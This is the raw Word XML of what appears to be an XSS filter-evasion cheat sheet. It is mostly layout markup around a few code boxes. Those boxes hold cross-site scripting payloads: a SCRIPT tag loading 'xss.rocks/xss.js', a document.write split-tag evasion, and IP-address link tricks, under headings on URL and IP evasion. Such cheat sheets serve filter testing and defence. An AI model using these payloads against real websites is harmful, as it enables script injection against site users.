                              <a:gd name="T5" fmla="*/ T4 w 4715"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4715"/>
                              <a:gd name="T10" fmla="+- 0 347 166"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4715"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4715"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4715"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4715"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6308 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4715"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6329 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4715"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6329 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4715"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6311 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4715"/>
                              <a:gd name="T42" fmla="+- 0 347 166"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6308 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4715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15" h="183">
                                <a:moveTo>
                                  <a:pt x="469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694" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4715" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4715" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4697" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="469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Text Box 564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471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a="&gt;'&gt;"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httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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3" o:spid="_x0000_s1863" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:235.75pt;height:9.15pt;z-index:-15588352;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,166" coordsize="471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">
                <v:shape id="Freeform 565" o:spid="_x0000_s1864" style="position:absolute;left:1614;top:165;width:4715;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="471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vYxsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCb7qxRZHUVYrF0qvRUHJ7ZF+z&#10;abNvQ3bV6K93BcHjMDPfMMt1bxtxos7XjhVMJwkI4tLpmisFh/12vADhA7LGxjEpuJCH9Wo4WGKq&#10;3Zl3dMpCJSKEfYoKTAhtKqUvDVn0E9cSR+/XdRZDlF0ldYfnCLeNfE2SubRYc1ww2NLGUPmfHa2C&#10;v8M177df+bTITFMcZ5+bov25KPUy6j/eQQTqwzP8aH9rBbP5G9zPx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O9jGxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m4694,182l21,182r-3,-1l,161r,-3l,21,21,,4694,r21,21l4715,161r-18,20l4694,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4694,348;21,348;18,347;0,327;0,324;0,187;21,166;4694,166;4715,187;4715,327;4697,347;4694,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 564" o:spid="_x0000_s1865" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:471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UeV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R5V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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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a="&gt;'&gt;"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>still</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>worries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>me,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nearly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>impossible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stop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without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>blocking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>content:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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2864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151765</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4490720" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="559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90720" cy="116205"/>
                          <a:chOff x="1614" y="239"/>
                          <a:chExt cx="7072" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="560" name="Freeform 562"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="239"/>
                            <a:ext cx="7072" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8665 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 7072"/>
                              <a:gd name="T2" fmla="+- 0 422 239"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 7072"/>
                              <a:gd name="T6" fmla="+- 0 422 239"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 7072"/>
                              <a:gd name="T10" fmla="+- 0 421 239"/>
                              <a:gd name="T11" fmla="*/ 421 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 7072"/>
                              <a:gd name="T14" fmla="+- 0 401 239"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 7072"/>
                              <a:gd name="T18" fmla="+- 0 397 239"/>
                              <a:gd name="T19" fmla="*/ 397 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 7072"/>
                              <a:gd name="T22" fmla="+- 0 260 239"/>
                              <a:gd name="T23" fmla="*/ 260 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 7072"/>
                              <a:gd name="T26" fmla="+- 0 239 239"/>
                              <a:gd name="T27" fmla="*/ 239 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8665 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 7072"/>
                              <a:gd name="T30" fmla="+- 0 239 239"/>
                              <a:gd name="T31" fmla="*/ 239 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8686 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 7072"/>
                              <a:gd name="T34" fmla="+- 0 260 239"/>
                              <a:gd name="T35" fmla="*/ 260 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8686 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 7072"/>
                              <a:gd name="T38" fmla="+- 0 401 239"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8668 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 7072"/>
                              <a:gd name="T42" fmla="+- 0 421 239"/>
                              <a:gd name="T43" fmla="*/ 421 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8665 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 7072"/>
                              <a:gd name="T46" fmla="+- 0 422 239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072" h="183">
                                <a:moveTo>
                                  <a:pt x="7051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051" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7072" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7072" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7054" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="705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Text Box 561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39"/>
                            <a:ext cx="707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&lt;SCRIPT&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT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9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SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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0" o:spid="_x0000_s1866" style="position:absolute;margin-left:80.7pt;margin-top:11.95pt;width:353.6pt;height:9.15pt;z-index:-15587840;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,239" coordsize="70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">
                <v:shape id="Freeform 562" o:spid="_x0000_s1867" style="position:absolute;left:1614;top:239;width:7072;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="707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SS8MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/Y/hDfwIpo6Wdk6owxHwV1EO3d/NM+2&#10;2ryUJLb1v18Ogx0/vt+rzWha0ZPzjWUFi3kCgri0uuFKwek7n72C8AFZY2uZFNzJw2b9+LDCTNuB&#10;j9QXoRIxhH2GCuoQukxKX9Zk0M9tRxy5s3UGQ4SuktrhEMNNK5+TJJUGG44NNXa0ram8Fjej4Gt6&#10;P3z2vNfX9HxZvi2nP/vbJVdq8jR+vIMINIZ/8Z97pxW8pHF+PB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GSS8MAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m7051,183l21,183r-3,-1l,162r,-4l,21,21,,7051,r21,21l7072,162r-18,20l7051,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="7051,422;21,422;18,421;0,401;0,397;0,260;21,239;7051,239;7072,260;7072,401;7054,421;7051,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 561" o:spid="_x0000_s1868" type="#_x0000_t202" style="position:absolute;left:1614;top:239;width:70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9zc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rd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r3N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&lt;SCRIPT&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="19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SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2901"/>
        </w:tabs>
        <w:spacing w:before="101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76384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1518920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1226820" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="556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6820" cy="116205"/>
                          <a:chOff x="2392" y="107"/>
                          <a:chExt cx="1932" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="557" name="Freeform 559"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2392" y="107"/>
                            <a:ext cx="1932" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4303 2392"/>
                              <a:gd name="T1" fmla="*/ T0 w 1932"/>
                              <a:gd name="T2" fmla="+- 0 289 107"/>
                              <a:gd name="T3" fmla="*/ 289 h 183"/>
                              <a:gd name="T4" fmla="+- 0 2413 2392"/>
                              <a:gd name="T5" fmla="*/ T4 w 1932"/>
                              <a:gd name="T6" fmla="+- 0 289 107"/>
                              <a:gd name="T7" fmla="*/ 289 h 183"/>
                              <a:gd name="T8" fmla="+- 0 2410 2392"/>
                              <a:gd name="T9" fmla="*/ T8 w 1932"/>
                              <a:gd name="T10" fmla="+- 0 289 107"/>
                              <a:gd name="T11" fmla="*/ 289 h 183"/>
                              <a:gd name="T12" fmla="+- 0 2392 2392"/>
                              <a:gd name="T13" fmla="*/ T12 w 1932"/>
                              <a:gd name="T14" fmla="+- 0 268 107"/>
                              <a:gd name="T15" fmla="*/ 268 h 183"/>
                              <a:gd name="T16" fmla="+- 0 2392 2392"/>
                              <a:gd name="T17" fmla="*/ T16 w 1932"/>
                              <a:gd name="T18" fmla="+- 0 265 107"/>
                              <a:gd name="T19" fmla="*/ 265 h 183"/>
                              <a:gd name="T20" fmla="+- 0 2392 2392"/>
                              <a:gd name="T21" fmla="*/ T20 w 1932"/>
                              <a:gd name="T22" fmla="+- 0 128 107"/>
                              <a:gd name="T23" fmla="*/ 128 h 183"/>
                              <a:gd name="T24" fmla="+- 0 2413 2392"/>
                              <a:gd name="T25" fmla="*/ T24 w 1932"/>
                              <a:gd name="T26" fmla="+- 0 107 107"/>
                              <a:gd name="T27" fmla="*/ 107 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4303 2392"/>
                              <a:gd name="T29" fmla="*/ T28 w 1932"/>
                              <a:gd name="T30" fmla="+- 0 107 107"/>
                              <a:gd name="T31" fmla="*/ 107 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4324 2392"/>
                              <a:gd name="T33" fmla="*/ T32 w 1932"/>
                              <a:gd name="T34" fmla="+- 0 128 107"/>
                              <a:gd name="T35" fmla="*/ 128 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4324 2392"/>
                              <a:gd name="T37" fmla="*/ T36 w 1932"/>
                              <a:gd name="T38" fmla="+- 0 268 107"/>
                              <a:gd name="T39" fmla="*/ 268 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4306 2392"/>
                              <a:gd name="T41" fmla="*/ T40 w 1932"/>
                              <a:gd name="T42" fmla="+- 0 289 107"/>
                              <a:gd name="T43" fmla="*/ 289 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4303 2392"/>
                              <a:gd name="T45" fmla="*/ T44 w 1932"/>
                              <a:gd name="T46" fmla="+- 0 289 107"/>
                              <a:gd name="T47" fmla="*/ 2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932" h="183">
                                <a:moveTo>
                                  <a:pt x="191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911" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1932" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1932" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1914" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="191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Text Box 558"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2392" y="107"/>
                            <a:ext cx="19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7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hyperlink r:id="rId54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http://www.google.com/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7" o:spid="_x0000_s1869" style="position:absolute;left:0;text-align:left;margin-left:119.6pt;margin-top:5.35pt;width:96.6pt;height:9.15pt;z-index:-17540096;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="2392,107" coordsize="193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">
                <v:shape id="Freeform 559" o:spid="_x0000_s1870" style="position:absolute;left:2392;top:107;width:1932;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="193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W8/8IA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE7wt+h/AEb2uq4qrVKCIsyN78c/H2aJ5N&#10;sXkpSbZWP/1GEPY4zMxvmNWms7VoyYfKsYLRMANBXDhdcangfPr+nIMIEVlj7ZgUPCjAZt37WGGu&#10;3Z0P1B5jKRKEQ44KTIxNLmUoDFkMQ9cQJ+/qvMWYpC+l9nhPcFvLcZZ9SYsVpwWDDe0MFbfjr1WA&#10;sX0c8OJPk+1VNrsfXjwNaqUG/W67BBGpi//hd3uvFUynM3idSU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bz/wgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m1911,182l21,182r-3,l,161r,-3l,21,21,,1911,r21,21l1932,161r-18,21l1911,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1911,289;21,289;18,289;0,268;0,265;0,128;21,107;1911,107;1932,128;1932,268;1914,289;1911,289" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 558" o:spid="_x0000_s1871" type="#_x0000_t202" style="position:absolute;left:2392;top:107;width:193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e7c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Te7c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7"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:hyperlink r:id="rId55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http://www.google.com/</w:t>
                          </w:r>
                        </w:hyperlink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Assuming</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>programmatically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>disallowed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk4"/>
        <w:spacing w:before="102"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>IP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Versus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Hostname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w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="2083435" cy="116205"/>
                <wp:effectExtent l="5715" t="6985" r="6350" b="635"/>
                <wp:docPr id="553" name="Group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3435" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3281" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="554" name="Freeform 55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81" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 3259 w 3281"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 3281"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 3281"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 3281"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 3281"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 3281"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 3281"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 3259 w 3281"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 3280 w 3281"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 3280 w 3281"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 3263 w 3281"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 3259 w 3281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3281" h="183">
                                <a:moveTo>
                                  <a:pt x="325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259" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3280" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3280" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3263" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="325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Text Box 55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28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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId56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http://66.102.7.147/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"&gt;XSS&lt;/A&gt;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4" o:spid="_x0000_s1872" style="width:164.05pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="328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">
                <v:shape id="Freeform 556" o:spid="_x0000_s1873" style="position:absolute;width:3281;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="328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1X8cA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IKvdWNbVM1uooUC4WCxSiit0f2&#10;NRvMvg3ZNab/visUehxm5htmvuxtLTpqfeVYwWiYgCAunK64VLDfvT9OQPiArLF2TAp+yMNyMbib&#10;Y6bdlbfU5aEUEcI+QwUmhCaT0heGLPqha4ij9+1aiyHKtpS6xWuE21o+JcmrtFhxXDDY0Juh4pxf&#10;rILJaTp+NvlqvU43X8fRZSo3n4dOqYf7fjUDEagP/+G/9odWkKYvcDsTj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MdV/HAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m3259,182l21,182r-3,l,161r,-3l,21,21,,3259,r21,21l3280,161r-17,21l3259,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3259,182;21,182;18,182;0,161;0,158;0,21;21,0;3259,0;3280,21;3280,161;3263,182;3259,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 555" o:spid="_x0000_s1874" type="#_x0000_t202" style="position:absolute;width:328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Vxc8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3VjIV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lXFz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7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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId57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http://66.102.7.147/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"&gt;XSS&lt;/A&gt;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2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>URL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Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/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3888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159385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3634105" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="550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4105" cy="116205"/>
                          <a:chOff x="1614" y="251"/>
                          <a:chExt cx="5723" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="551" name="Freeform 553"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="251"/>
                            <a:ext cx="5723" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7316 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 5723"/>
                              <a:gd name="T2" fmla="+- 0 434 251"/>
                              <a:gd name="T3" fmla="*/ 434 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 5723"/>
                              <a:gd name="T6" fmla="+- 0 434 251"/>
                              <a:gd name="T7" fmla="*/ 434 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 5723"/>
                              <a:gd name="T10" fmla="+- 0 433 251"/>
                              <a:gd name="T11" fmla="*/ 433 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 5723"/>
                              <a:gd name="T14" fmla="+- 0 413 251"/>
                              <a:gd name="T15" fmla="*/ 413 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 5723"/>
                              <a:gd name="T18" fmla="+- 0 409 251"/>
                              <a:gd name="T19" fmla="*/ 409 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 5723"/>
                              <a:gd name="T22" fmla="+- 0 273 251"/>
                              <a:gd name="T23" fmla="*/ 273 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 5723"/>
                              <a:gd name="T26" fmla="+- 0 251 251"/>
                              <a:gd name="T27" fmla="*/ 251 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7316 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 5723"/>
                              <a:gd name="T30" fmla="+- 0 251 251"/>
                              <a:gd name="T31" fmla="*/ 251 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7337 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 5723"/>
                              <a:gd name="T34" fmla="+- 0 273 251"/>
                              <a:gd name="T35" fmla="*/ 273 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7337 1614"/>
